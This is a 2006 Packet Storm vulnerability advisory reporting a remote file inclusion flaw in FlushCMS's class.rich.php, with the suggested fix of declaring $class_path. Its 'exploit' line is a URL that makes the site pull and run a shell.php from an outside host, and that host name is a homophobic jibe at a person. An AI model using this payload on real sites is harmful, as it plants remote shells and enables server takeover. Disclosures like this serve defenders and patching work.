flush.txt

2006-10-02T00:00:00
ID PACKETSTORM:50367
Type packetstorm
Reporter Drago84
Modified 2006-10-02T00:00:00

Description

                                        
                                            `<div id="_htmlarea_default_style_" style="font:10pt arial,helvetica,sans-serif">###### ToXiC #########################<br>#<br>#BuG FounD  by Drago84<br>#<br>#Application Affect: <a href="http://webmail.tele2internet.it/Redirect/Anchor//sourceforge.net/project/showfiles.php?group_id=154056&package_id=176954&release_id=387863" class="tup" id="pkg0_0"  
target="_blank">  
FlushCMS</a><br>#Source Code:<br>#http://prdownloads.sourceforge.net/flushphp/flushcms.1.0.0.pre2.tar.gz?download<br>#Problem Is $class_path not Declare<br>#Solution : Declare $class_path<br>#Page Vulnerable : class.rich.php<br>#Dir Page Vulnerable: /include/editor/<br># Exempe Of ExPloit is:<br>#http://www.site.com/flushcms/include/editor/class.rich.php?class_path=http://marcusbestlamer.gay/shell.php?<br>#GrEatZ All Member of ToXiC, Str0ke <br>###### ToXiC  
#########################</div>  
`